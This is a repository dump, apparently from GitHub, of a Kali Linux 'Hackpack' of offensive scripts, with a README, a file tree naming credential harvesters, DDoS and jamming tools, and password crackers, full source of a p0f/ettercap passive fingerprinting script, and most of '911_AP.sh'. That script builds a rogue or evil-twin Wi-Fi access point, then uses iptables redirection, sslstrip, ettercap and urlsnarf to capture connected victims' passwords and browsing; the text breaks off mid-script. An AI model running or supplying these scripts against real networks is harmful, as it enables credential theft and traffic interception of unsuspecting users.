├── README.md
├── hackpack
├── bug.png
├── elisa.png
├── hackpack
│ ├── 40_Cred_Harvester_1.4.sh
│ ├── 70_Passive_Fingerprint_1.2.sh
│ ├── 911_AP.sh
│ ├── AP_fucker.py
│ ├── Find_Hosts.sh
│ ├── MACchanger.sh
│ ├── Recon.sh
│ ├── SQL
│ │ └── autosploit.pl
│ ├── admin.pl
│ ├── ddos
│ │ ├── LRDoS.sh
│ │ ├── slowloris.pl
│ │ └── wifijammer_0.1.sh
│ ├── ejacoolas.sh
│ ├── enum.sh
│ ├── googli.pl
│ ├── ipchecker.sh
│ ├── lbd.sh
│ ├── n1tr0g3n_SSL_BT-5.sh
│ ├── readysethack.py
│ ├── smskiller.sh
│ ├── soundcloud.sh
│ ├── ssh_crack3r.sh
│ ├── ssl_phucker.sh
│ ├── webservmethod.sh
│ ├── wlm
│ └── wpabust.sh
├── install.sh
├── launchers
│ ├── 911-AP.desktop
│ ├── Ghost_Phisher.desktop
│ ├── Recon.desktop
│ ├── admincp.desktop
│ ├── apfucker.desktop
│ ├── autosploit.desktop
│ ├── credhavester.desktop
│ ├── easy-creds.desktop
│ ├── ejacoolas.desktop
│ ├── enum.desktop
│ ├── findhosts.desktop
│ ├── googli.desktop
│ ├── ipchecker.desktop
│ ├── lazykali.desktop
│ ├── lbd.desktop
│ ├── lrdos.desktop
│ ├── macchanger.desktop
│ ├── n1tr0g3n_ssl.desktop
│ ├── passivefingerprint.desktop
│ ├── pwnstar.desktop
│ ├── readysethack.desktop
│ ├── recon-ng.desktop
│ ├── slowloris.desktop
│ ├── smskiller.desktop
│ ├── soundcloud.desktop
│ ├── ssh_crack3r..desktop
│ ├── ssl_phucker.desktop
│ ├── subterfuge.desktop
│ ├── webservmethod.desktop
│ ├── wifijammer.desktop
│ ├── wlm.desktop
│ ├── wpabust.desktop
│ └── yamas.desktop
├── lzdatabase.directory
├── lzdos.directory
├── lzhackpack.directory
├── lzhackscripts.directory
├── lzrecon.directory
├── lzsniffspoof.directory
├── lztools.directory
├── lzwireless.directory
└── myhackpack.menu
└── lazykali.sh
/README.md:
--------------------------------------------------------------------------------
1 | This is a collection of scripts to add to kali linux.
2 | It will create a new menu named Hackpack in your applications menu.
3 | It Should work on any flavor of Debian , Ubuntu etc....
4 | But is made mainly for Kali along with lazykali.
5 | This script will also add launchers for various programs installed by lazykali.
6 | Credits to everyone whose scripts are included in here.
7 | ie. n1trog3n, TAPE, em3rgency etc.............. All authors credits are in their various scripts.
8 | None of this scripts have been altered in anyway to my knowledge.
9 |
10 |
11 | if you have any issues with this package please contact me.
12 |
13 | Installation video https://www.youtube.com/watch?v=00Vm2Du8P5I
14 |
--------------------------------------------------------------------------------
/hackpack/bug.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thcbin/Lazykali-and-Hackpack/062be6afe25b55aec260e80c7adc8a3bb47cda3f/hackpack/bug.png
--------------------------------------------------------------------------------
/hackpack/elisa.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thcbin/Lazykali-and-Hackpack/062be6afe25b55aec260e80c7adc8a3bb47cda3f/hackpack/elisa.png
--------------------------------------------------------------------------------
/hackpack/hackpack/70_Passive_Fingerprint_1.2.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #NAME=Passive Fingerprinting
3 |
4 | # Hax0rBl0x - 70_Passive_Fingerprint.sh
5 | # Copyright (C) 2013 Dopey and ShadowBlade72
6 | # Version 1.2
7 | #
8 | # This program is free software: you can redistribute it and/or modify
9 | # it under the terms of the GNU General Public License as published by
10 | # the Free Software Foundation, either version 3 of the License, or
11 | # (at your option) any later version.
12 | #
13 | # This program is distributed in the hope that it will be useful,
14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | # GNU General Public License for more details.
17 | #
18 | # You should have received a copy of the GNU General Public License
19 | # along with this program. If not, see .
20 |
21 | #### DO NOT EDIT ABOVE THIS LINE ####
22 | #### EDIT USER VARIABLES BELOW THIS LINE ####
23 |
24 | Report_File="$HOME/Passive_Fingerprint_Report_$(date +%d%b%y:%H%M).txt"
25 | Refresh_Time=10 #Recommend 30 seconds for RaspberryPI
26 | Generate_Report_Time=10
27 |
28 | #### EDIT USER VARIABLES ABOVE THIS LINE ####
29 | #### DO NOT EDIT BELOW THIS LINE ####
30 |
31 | #Trap keyboard interrupt (control-c)
32 | trap control_c SIGINT
33 |
34 | #Declare arrays and define variables
35 | Ettercap_Passive_Log="/tmp/.passive_ettercap_data.eci"
36 | Temp_Etterlog_XML="/tmp/.temp_etterlog_output.txt"
37 | Passive_Log_File="/tmp/.p0f_reports.txt"
38 | Temp_Sorted_XML="/tmp/.temp_sorted_XML.txt"
39 | declare -a Wireless_Interface IP_Array App_Array Number_Apps_Array OS_Array Browser_Array Number_Browser_Array Check_App Uptime_Array LastSeen_Array Mac_Array Type_Array Ports_Array Number_Ports_Array Manuf_Array Android_Array
40 | past_display_time=`date +%s`
41 | next_etterlog_time=`date +%s`
42 | next_report_time=`date +%s`
43 | LineNumber=0
44 | LineNumberPOF=0
45 | LineNumberEtt=0
46 | LineNumberPrev=0
47 | ReportsRemaining=0
48 | SETT=0
49 | SPOF=0
50 | OrigSTTY=`stty -g`
51 |
52 | #Grabbing all wireless interfaces
53 | Wireless_Interface=(`ip link show | awk -F: '/^[0-9]/ {print $2}'`)
54 | Number_Interfaces="${#Wireless_Interface[@]}"
55 |
56 | #Sanity Checks
57 | fnSanityCheck() {
58 | POF=0
59 | clear
60 | echo -e "Sanity check in progress... "
61 | fnPOFCheck
62 | fnEttercapCheck
63 | #Add in any dependances you want to check for using a ||. Example: $POF -eq 1 || $EXAMPLE -eq 1
64 | if [[ $POF -eq 1 || $ETTERCAP -eq 1 ]]; then
65 | fnInstallCheck
66 | else
67 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Sanity check successful. All dependencies found."
68 | sleep 1
69 | fnMainMenu
70 | fi
71 | }
72 |
73 | fnPOFCheck() {
74 | echo -e "$(tput setaf 2)[+]$(tput sgr0) p0f version check... \c"
75 | p0f -i vercheck > /tmp/.pofcheck 2>&1
76 | eval `cat /tmp/.pofcheck | head -n1 | awk '{for(i=1;i /dev/null 2>&1
119 | echo -e ".\c"
120 | wget lcamtuf.coredump.cx/p0f3/releases/p0f-3.06b.tgz > /dev/null 2>&1
121 | echo -e ".\c"
122 | if [[ ! -e /tmp/p0f-3.06b.tgz ]]; then
123 | echo -e "$(tput setaf 1)Failed! Could not connect to server$(tput sgr0)"
124 | sleep 1
125 | control_c
126 | fi
127 | tar -xvf /tmp/p0f-3.06b.tgz > /dev/null 2>&1
128 | echo -e ".\c"
129 | rm /tmp/p0f-3.06b.tgz > /dev/null 2>&1
130 | echo -e ".\c"
131 | cd /tmp/p0f-3.06b/ > /dev/null 2>&1
132 | echo -e ".\c"
133 | make > /dev/null 2>&1
134 | echo -e ".\c"
135 | mv p0f /usr/sbin/p0f > /dev/null 2>&1
136 | rc=$?
137 | echo -e ".\c"
138 | mv p0f.fp /etc/p0f > /dev/null 2>&1
139 | echo -e ".\c"
140 | cd ~
141 | echo -e ".\c"
142 | rm -R /tmp/p0f-3.06b/ > /dev/null 2>&1
143 | echo -e ".$(tput sgr0)\c"
144 | if [[ $rc -eq 0 ]]; then
145 | echo -e "$(tput setaf 2)Success$(tput sgr0)"
146 | sleep 1
147 | else
148 | echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
149 | sleep 1
150 | fi
151 | fi
152 | if [[ $ETTER -eq 1 ]]; then
153 | echo -e "$(tput setaf 2)\n[+]$(tput sgr0) Installing ettercap... \c"
154 | apt-get install ettercap-graphical >/dev/null 2>&1
155 | rc=$?
156 | echo -e ".\c"
157 | if [[ $rc -eq 0 ]]; then
158 | echo -e "$(tput setaf 2)Success$(tput sgr0)"
159 | sleep 1
160 | else
161 | echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
162 | sleep 1
163 | fi
164 | fi
165 | else
166 | echo -e "$(tput setaf 1)[-]$(tput sgr0) You must be root to install dependances!\n"
167 | control_c
168 | fi
169 | fnSanityCheck
170 | }
171 |
172 | control_c()
173 | #Run if user hits control-c
174 | {
175 | tput sgr0
176 | clear
177 | echo -e "Cleaning up! Please wait..."
178 | if [[ $SPOF -eq 1 && $PIDPOF && `ps -ef | grep -v grep | grep -i $PIDPOF` ]]; then
179 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Killing p0f...\c"
180 | kill $PIDPOF
181 | rc=$?
182 | if [[ $rc -eq 0 ]]; then
183 | echo -e "$(tput setaf 2)Success$(tput sgr0)"
184 | else
185 | echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
186 | fi
187 | fi
188 | if [[ $SETT -eq 1 && $PIDETTERCAP && `ps -ef | grep -v grep | grep -v xterm | grep -i $PIDETTERCAP` ]]; then
189 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Killing ettercap...\c"
190 | kill -9 $PIDETTERCAP
191 | rc=$?
192 | if [[ $rc -eq 0 ]]; then
193 | echo -e "$(tput setaf 2)Success$(tput sgr0)"
194 | else
195 | echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
196 | fi
197 | fi
198 | if [[ $ReportsRemaining -gt 0 ]]; then
199 | echo -e "$(tput setaf 1)[-]$(tput sgr0)Unprocessed Reports: $ReportsRemaining... Would you like to process these before exiting? [yes]: \c"
200 | read SelectionInit
201 | Selection=$(tr '[:upper:]' '[:lower:]' <<<$SelectionInit)
202 | if [[ -z $Selection || $Selection == "yes" || $Selection == "y" || $Selection == "ye" ]]; then
203 | echo -e "$(tput setaf 1)[-]$(tput sgr0)This may take a while... Please be patient."
204 | past_display_time=$((`date +%s` + `date +%s`))
205 | fnSniff_Etterlog
206 | fnSniff_POF
207 | fi
208 | fi
209 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Generating final report...\c"
210 | fnGenerate_Report
211 | echo -e "$(tput setaf 2)Complete$(tput sgr0)"
212 | if [[ $SPOF -eq 1 && -f $Passive_Log_File ]]; then
213 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Deleting p0f output file...\c"
214 | rm $Passive_Log_File
215 | echo -e "$(tput setaf 2)Complete$(tput sgr0)"
216 | fi
217 | if [[ $SETT -eq 1 && -f $Ettercap_Passive_Log ]]; then
218 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Deleting Ettercap output file...\c"
219 | rm $Ettercap_Passive_Log
220 | echo -e "$(tput setaf 2)Complete$(tput sgr0)"
221 | fi
222 | if [[ `pgrep Hax0rBl0x` ]]; then
223 | echo -e "\n*** Returning to main menu... ***\n"
224 | else
225 | echo -e "\n*** Exiting script... ***\n"
226 | fi
227 | stty $OrigSTTY
228 | exit
229 | }
230 |
231 | fnMainMenu()
232 | {
233 | check=0
234 | while [[ $check -ne 1 ]]; do
235 | clear
236 | echo -e "****************** Passive Fingerprinting Script ******************\n"
237 | echo -e "Please enter interface: \c"
238 | read Selection
239 | if [ -z "$Selection" ]; then
240 | echo "No input. Exiting function."
241 | sleep 2
242 | control_c
243 | fi
244 |
245 | #See if input is an interface
246 | count=0
247 | while [[ $count -ne $Number_Interfaces ]]; do
248 | if [[ "$Selection" == "${Wireless_Interface[$count]}" ]]; then
249 | check=1
250 | Interface="$Selection"
251 | Source="-i $Selection"
252 | count=$Number_Interfaces
253 | else
254 | ((count++))
255 | fi
256 | done
257 |
258 | #See if input is a file
259 | # if [ -f $Selection ]; then
260 | # check=1
261 | # Source="-r $Selection"
262 | # fi
263 | if [[ $check -eq 0 ]]; then
264 | echo "Error! '$Selection' is not an interface!"
265 | sleep 3
266 | fi
267 | done
268 |
269 | #Set Current Network
270 | Current_Network=$(ifconfig $Interface | awk -F ' *|:' '/inet ad*r/{split($4,a,"\\."); printf("%d.%d.%d\n", a[1],a[2],a[3])}')
271 | fnStart_p0f
272 | fnStart_Ettercap
273 | sleep 1
274 | fnSniff_It
275 | }
276 |
277 | fnStart_p0f()
278 | {
279 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Checking for previous instances of p0f...\c"
280 | PIDPOF=$(ps -ef | grep -v grep | grep -v xterm | grep -i p0f | grep -i "\-o $Passive_Log_File" | head -n1 | awk '{ print $2 }')
281 | if [[ $PIDPOF ]]; then
282 | echo -e "$(tput setaf 2) found!\n [+]$(tput sgr0) p0f logging is running...\c"
283 | echo "$(tput setaf 2)Complete$(tput sgr0) [PID: $PIDPOF]"
284 | if [[ -f $Passive_Log_File ]]; then
285 | return
286 | else
287 | echo -e "$(tput setaf 1)[-]$(tput sgr0) p0f log file not found...\c"
288 | fi
289 | else
290 | echo "$(tput setaf 2)None found$(tput sgr0)"
291 | fi
292 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Starting p0f in background...\c"
293 | SPOF=1
294 | p0f $Source -f /etc/p0f/p0f.fp -o $Passive_Log_File >/dev/null 2>&1 &
295 | PIDPOF=$!
296 | sleep 1
297 | if [[ `ps -ef | grep -i p0f | grep -i $PIDPOF` ]]; then
298 | echo "$(tput setaf 2)Success$(tput sgr0) [PID: $PIDPOF]"
299 | else
300 | echo -e "$(tput setaf 1)Failed$(tput sgr0)"
301 | sleep 3
302 | control_c
303 | fi
304 | sleep 1
305 | }
306 |
307 | fnStart_Ettercap()
308 | {
309 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Checking for previous instances of Ettercap...\c"
310 | EttercapLogClean=`echo $Ettercap_Passive_Log | awk -F'\n' '{ gsub (/\.eci/,"",$1); print $1 }'`
311 | PIDETTERCAP=$(ps -ef | grep -v grep | grep -v xterm | grep -i "ettercap" | grep -i "\-l $EttercapLogClean" | head -n1 | awk '{ print $2 }')
312 | if [[ $PIDETTERCAP ]]; then
313 | echo -e "$(tput setaf 2) found!\n [+]$(tput sgr0) Ettercap logging is running...\c"
314 | echo "$(tput setaf 2)Complete$(tput sgr0) [PID: $PIDETTERCAP]"
315 | if [[ -f $Ettercap_Passive_Log ]]; then
316 | return
317 | else
318 | echo -e "$(tput setaf 1)[-]$(tput sgr0) Ettercap log file not found...\c"
319 | fi
320 | else
321 | echo "$(tput setaf 2)None found$(tput sgr0)"
322 | fi
323 | echo -e "$(tput setaf 2)[+]$(tput sgr0) Starting Ettercap in background...\c"
324 | SETT=1
325 | ettercap -TQ -i $Interface -u -l $EttercapLogClean >/dev/null 2>&1 &
326 | PIDETTERCAP=$!
327 | sleep 1
328 | if [[ `ps -ef | grep -i ettercap | grep -i $PIDETTERCAP` ]]; then
329 | echo "$(tput setaf 2)Success$(tput sgr0) [PID: $PIDETTERCAP]"
330 | else
331 | echo -e "$(tput setaf 1)Failed$(tput sgr0)"
332 | sleep 3
333 | control_c
334 | fi
335 | sleep 1
336 | }
337 |
338 | fnSniff_Etterlog()
339 | {
340 | etterlog -x $Ettercap_Passive_Log > $Temp_Etterlog_XML 2>&1
341 | perl -e'$x=join("",);$x=~s/\s*[\r\n]+\s*//gs; $x=~s/^.*?().*?$/$1/i;$x=~s/<\/host>/<\/host>\n/gi;print $x;' <$Temp_Etterlog_XML >$Temp_Sorted_XML
342 | rm $Temp_Etterlog_XML
343 | for LINE in `cat $Temp_Sorted_XML`; do
344 | if [[ `date +%s` -gt $(( $past_display_time + ( $Refresh_Time -1 ))) ]]; then
345 | past_display_time=`date +%s`
346 | fnStats
347 | fnDisplay_Info
348 | fi
349 | ((LineNumberEtt++))
350 | fnParse_Data
351 | done
352 | rm $Temp_Sorted_XML
353 | }
354 |
355 | fnSniff_POF() {
356 | for LINE in `tail -"$ReportsRemaining" "$Passive_Log_File"`; do
357 | if [[ `date +%s` -gt $(( $past_display_time + ( $Refresh_Time -1 ))) ]]; then
358 | past_display_time=`date +%s`
359 | fnStats
360 | fnDisplay_Info
361 | fi
362 | fnParse_Data
363 | ((ReportsRemaining--))
364 | done
365 | }
366 |
367 | fnSniff_It()
368 | {
369 | fnDisplay_Info
370 | IFS=$'\n'
371 | LineNumber=0
372 | while :; do
373 | fnStats
374 | fnSniff_POF
375 | if [[ -f $Ettercap_Passive_Log && `date +%s` -gt $next_etterlog_time ]]; then
376 | next_etterlog_time=$(( `date +%s` + 10 ))
377 | fnSniff_Etterlog
378 | fi
379 | done
380 | }
381 |
382 | fnStats() {
383 | LineNumberPrev=$LineNumberPOF
384 | LineNumberPOF=`cat $Passive_Log_File | wc -l`
385 | LineNumber=$((LineNumberPOF + LineNumberEtt))
386 | ReportsRemaining=$(((LineNumberPOF - LineNumberPrev) + ReportsRemaining))
387 | }
388 |
389 | fnParse_Data()
390 | {
391 | if [[ -z "$LINE" ]]; then
392 | return;
393 | fi
394 |
395 | #See if data is from etterlog. If so, extract it. Otherwise, pull p0f data
396 | if [[ "$(echo $LINE | awk '{ print $1 }')" == " '{for(i=1;i<=NF;i++) { if($i ~ /host ip=/) { cl=$i; gsub(/.*=|\/.*/,"",cl); } if(i==NF) { printf "export Client=\"%s\"",cl; cl=""; } } }'`
398 | Mac=`echo $LINE | awk -vRS="" '{gsub(/.*/,"");print}' | head -n 1`
399 | Manuf=`echo $LINE | awk -vRS="" '{gsub(/.*/,"");print}' | head -n 1`
400 | Type=`echo $LINE | awk -vRS="" '{gsub(/.*/,"");print}' | head -n 1`
401 | Subject="cli"
402 | eval `echo $LINE | awk -F'[ =<>]' '{ count=0; { printf "declare -a PORTS" } for(i=1;i 10 ]]; then
722 | next_report_time=$((`date +%s` + $Generate_Report_Time))
723 | fnGenerate_Report
724 | fi
725 | }
726 |
727 | fnGenerate_Report()
728 | {
729 | echo -e "-=-=-=-=-=-=-=-=-=-=- Fingerprint Report -=-=-=-=-=-=-=-=-=-=-\n" > $Report_File
730 | count=1
731 | Timestamp=`date`
732 | echo -e "Report generated: $Timestamp" >> $Report_File
733 | echo -e "Reports scanned: $LineNumber\n\n" >> $Report_File
734 |
735 | while [[ $count -ne 255 ]]; do
736 | if [[ ${IP_Array[$count]} ]]; then
737 | echo -e "${IP_Array[$count]} \c" >> $Report_File
738 | if [[ ${Mac_Array[$count]} ]]; then
739 | echo -e "[${Mac_Array[$count]}]" >> $Report_File
740 | else
741 | echo "" >> $Report_File
742 | fi
743 | if [[ ${OS_Array[$count]} ]]; then
744 | if [[ ${Android[$count]} ]]; then
745 | echo " OS: ${OS_Array[$count]} (${Android[$count]})" >> $Report_File
746 | else
747 | echo " OS: ${OS_Array[$count]}" >> $Report_File
748 | fi
749 | fi
750 | if [[ ${Manuf_Array[$count]} ]]; then
751 | echo " Manufacturer: ${Manuf_Array[$count]}" >> $Report_File
752 | fi
753 | if [[ ${Type_Array[$count]} ]]; then
754 | echo " Host Type: ${Type_Array[$count]}" >> $Report_File
755 | fi
756 | if [[ ${Browser_Array[$count]} ]]; then
757 | echo " Browser(s): ${Browser_Array[$count]}" >> $Report_File
758 | fi
759 | if [[ ${App_Array[$count]} ]]; then
760 | echo " Apps(s): ${App_Array[$count]}" >> $Report_File
761 | fi
762 | if [[ ${Ports_Array[$count]} ]]; then
763 | echo " Port(s): ${Ports_Array[$count]}" >> $Report_File
764 | fi
765 | if [[ ${Uptime_Array[$count]} ]]; then
766 | echo " Uptime: ${Uptime_Array[$count]}" >> $Report_File
767 | fi
768 | echo -e "" >> $Report_File
769 | fi
770 | ((count++))
771 | done
772 | echo -e "\nEnd of Report" >> $Report_File
773 | }
774 | fnSanityCheck
775 |
--------------------------------------------------------------------------------
/hackpack/hackpack/911_AP.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # updated nov 25th
3 | # script coded by em3rgency
4 | # 911_AP version 1.1
5 | # xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
6 | # This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
7 | # Also includes workin ARP poisoning features.
8 | # Tested and working on BT5r3, Needs to have version 1.3 of dhcp3-server to work correctly
9 | # DOES NOT WORK with ISC-dhcp-server (YET!)
10 |
11 |
12 | #DEFINED COLOR SETTINGS
13 | RED=$(tput setaf 1 && tput bold)
14 | GREEN=$(tput setaf 2 && tput bold)
15 | STAND=$(tput sgr0)
16 | BLUE=$(tput setaf 6 && tput bold)
17 |
18 | echo ""
19 | echo ""
20 | echo ""
21 | echo $RED" +############################################+"
22 | echo $RED" + em3rgency's Fake AP SSL MITM script +"
23 | echo $RED" + +"
24 | echo $RED" + Version 1.1 +"
25 | echo $RED" + +"
26 | echo $RED" + www.em3rgency.com +"
27 | echo $RED" +############################################+"
28 | echo ""
29 | echo $BLUE" Visit http://www.em3rgency.com for updates to this script. Thanks"
30 | echo ""
31 | echo ""
32 | sleep 3
33 | clear
34 |
35 | echo $BLUE" em3rgency's MITM script Version 1.1 !"
36 | echo
37 | echo $RED" ************************************************";
38 | echo $RED" * 1. Prerequsites and Updates *";
39 | echo $RED" * 2. Run FAKE AP Static *";
40 | echo $RED" * 3. Run EVIL TWIN AP *";
41 | echo $RED" * 4. Run Standard ARP poison *";
42 | echo $RED" * 5. Netdiscover connected clients *";
43 | echo $RED" * 6. EXIT *";
44 | echo $RED" ************************************************";
45 | echo ""
46 |
47 | echo $BLUE" Select Menu Option:"
48 | read menuoption
49 | if [ $menuoption = "1" ]; then
50 | clear
51 | echo ""
52 | echo $RED" **************************************";
53 | echo $RED" * 1. Run apt-get update *";
54 | echo $RED" * 2. Run apt-get upgrade *";
55 | echo $RED" * 3. Distribution upgrade *";
56 | echo $RED" * 4. Edit etter.conf *";
57 | echo $RED" * 5. Edit DHCP tunnel interface *";
58 | echo $RED" * 6. Install Dhcp3-server *";
59 | echo $RED" * 7. Update aircrack-ng *";
60 | echo $RED" * 8. Return to Main Menu *";
61 | echo $RED" **************************************";
62 |
63 |
64 | echo $BLUE" Select Menu Option:"$STAND
65 | read menuoption
66 | if [ $menuoption = "1" ]; then
67 |
68 | #This command will look for any upgrades to your OS distro.
69 | sudo apt-get update
70 | clear
71 | ./911_AP.sh
72 | else
73 |
74 | #This command will look for any upgrades to your OS distro.
75 | if [ $menuoption = "2" ]; then
76 | sudo apt-get upgrade
77 | clear
78 | ./911_AP.sh
79 | else
80 |
81 | #This command will look for any distribution upgrades to your OS distro.
82 | if [ $menuoption = "3" ]; then
83 | sudo apt-get dist-upgrade
84 | clear
85 | ./911_AP.sh
86 | else
87 |
88 | #This command edit etter.conf
89 | if [ $menuoption = "4" ]; then
90 | nano /etc/etter.conf
91 | clear
92 | ./911_AP.sh
93 | else
94 |
95 | #This command will edit your tunnel interface
96 | if [ $menuoption = "5" ]; then
97 | nano /etc/default/dhcp3-server
98 | clear
99 | ./911_AP.sh
100 | else
101 |
102 | #This command will Install DHCP3-server on BT5r3
103 | if [ $menuoption = "6" ]; then
104 | apt-get install dhcp3-server
105 | clear
106 | ./911_AP.sh
107 | else
108 |
109 | #This command will update aircrack-ng to the latest nightly build
110 | if [ $menuoption = "7" ]; then
111 | sudo airodump-ng-oui-update
112 | clear
113 | else
114 | if [ $menuoption = "8" ]; then
115 | ./911_AP.sh
116 | fi
117 | fi
118 | fi
119 | fi
120 | fi
121 | fi
122 | fi
123 | fi
124 | else
125 |
126 | if [ $menuoption = "2" ]; then
127 | #This command will RUN The STATIC FAKE AP attack
128 | sleep 2
129 |
130 | # Configuring your Network interfaces
131 | echo
132 | echo $BLUE" [+] Lets get started shall we [+]"
133 | echo $STAND""
134 | echo ""
135 | route -n -A inet | grep UG
136 | echo ""
137 | echo ""
138 | echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
139 | read -e gatewayip
140 | clear
141 | echo -n "Enter your interface that is connected to the internet, Example eth0: "
142 | read -e internet_interface
143 | clear
144 | echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
145 | read -e fakeap_interface
146 | clear
147 | echo -n "Enter the ESSID you would like your rogue AP to be called: "
148 | read -e ESSID
149 | clear
150 | echo -n "Name the folder you want to save your logs into "
151 | read -e SESSION
152 | #creates session directory
153 | mkdir -p /root/$SESSION
154 | clear
155 |
156 | echo $BLUE" Starting Airmon-ng and creating mon0 interface...."$STAND
157 | airmon-ng start $fakeap_interface
158 | fakeap=$fakeap_interface
159 | fakeap_interface="mon0"
160 | sleep 2
161 | clear
162 |
163 | echo $RED" [##########################################################]"
164 | echo $RED" [+][+][+] Running MITM attack vectors [+][+][+]"
165 | echo $RED" [##########################################################]"
166 | sleep 5
167 | echo ""
168 |
169 | # Dhcpd directory and dhcpd.conf creation
170 | mkdir -p "/var/run/dhcpd"
171 | echo "authoritative;
172 |
173 | default-lease-time 700;
174 | max-lease-time 8000;
175 |
176 | subnet 10.0.0.0 netmask 255.255.255.0 {
177 | option routers 10.0.0.1;
178 | option subnet-mask 255.255.255.0;
179 |
180 | option domain-name "\"$ESSID\"";
181 | option domain-name-servers 10.0.0.1;
182 |
183 | range 10.0.0.30 10.0.0.60;
184 |
185 | }" > /var/run/dhcpd/dhcpd.conf
186 |
187 | # FAKEAP setup
188 | echo $BLUE" Configuring and Starting your FAKE Access Point...."
189 | xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
190 | sleep 3
191 | echo ""
192 |
193 | # Setup your IP Tables
194 | echo $BLUE" Configuring your IP tables...."
195 | ifconfig lo up
196 | ifconfig at0 up &
197 | sleep 1
198 | ifconfig at0 10.0.0.1 netmask 255.255.255.0
199 | ifconfig at0 mtu 1400
200 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
201 | iptables --flush
202 | iptables --table nat --flush
203 | iptables --delete-chain
204 | iptables --table nat --delete-chain
205 | echo 1 > /proc/sys/net/ipv4/ip_forward
206 | iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
207 | iptables -P FORWARD ACCEPT
208 | iptables --append FORWARD --in-interface at0 -j ACCEPT
209 | iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
210 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
211 | echo ""
212 |
213 | # DHCP
214 | echo $BLUE" Setting up DHCP to work with $ESSID...."
215 | touch /var/run/dhcpd.pid
216 | chown dhcpd:dhcpd /var/run/dhcpd.pid
217 | xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
218 | sleep 3
219 | echo ""
220 |
221 | # SSLstrip
222 | echo $BLUE" Starting SSLstrip to enumerate user credentials...."
223 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
224 | sleep 2
225 | echo ""
226 |
227 | # Ettercap
228 | echo $BLUE" Starting Ettercap to sniff client passwords...."
229 | xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
230 | sleep 3
231 | echo ""
232 |
233 | # URLSnarf
234 | echo $BLUE" Starting URLSnarf to show the websites the victim browses...."
235 | xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
236 | sleep 3
237 | clear
238 |
239 |
240 | # SSLstrip.log cat the file sslstrip.log
241 | xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!
242 |
243 | clear
244 | echo
245 | echo $RED" ####################################################################"
246 | echo $RED" [ em3rgency's Fake AP SSL MITM attack is now running... ]"
247 | echo $RED" [ ]"
248 | echo $RED" [ Press Y then ENTERKEY to close kill and clean up the script ]"
249 | echo $RED" [ ]"
250 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
251 | echo $RED" ####################################################################"
252 | echo ""
253 | echo ""
254 | read WISH
255 |
256 | # Kill all
257 | if [ $WISH = "y" ] ; then
258 | echo
259 | echo $BLUE" Cleaning up your mess"$STAND
260 | echo ''
261 | sleep 2
262 |
263 | kill ${fakeapid}
264 | kill ${dhcpid}
265 | kill ${sslstripid}
266 | kill ${ettercapid}
267 | kill ${urlsnarfid}
268 | kill ${dritnetid}
269 | kill ${sslstriplogid}
270 |
271 | airmon-ng stop $fakeap_interface
272 | airmon-ng stop $fakeap
273 | echo "0" > /proc/sys/net/ipv4/ip_forward
274 | iptables --flush
275 | iptables --table nat --flush
276 | iptables --delete-chain
277 | iptables --table nat --delete-chain
278 | clear
279 | echo ""
280 | echo ""
281 | echo $RED" [+][+][+] Everything is now cleaned up [+][+][+]"
282 | echo $RED" [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
283 | echo $RED" [+][+][+] Coded by em3rgency [+][+][+]"
284 | sleep 5
285 | exit
286 |
287 | fi
288 |
289 | sleep 3
290 | clear
291 |
292 | ./911_AP.sh
293 | else
294 |
295 | # This command will RUN The EVIL TWIN AP attack
296 | if [ $menuoption = "3" ]; then
297 | sleep 3
298 |
299 | # Configuring your Network interfaces
300 | echo
301 | echo $BLUE" [+] Lets get started shall we [+]"$STAND
302 | echo ""
303 | echo ""
304 | route -n -A inet | grep UG
305 | echo ""
306 | echo ""
307 | echo ""
308 | echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
309 | read -e gatewayip
310 | clear
311 | echo -n "Enter your interface that is connected to the internet, Example eth0: "
312 | read -e internet_interface
313 | clear
314 | echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
315 | read -e fakeap_interface
316 | clear
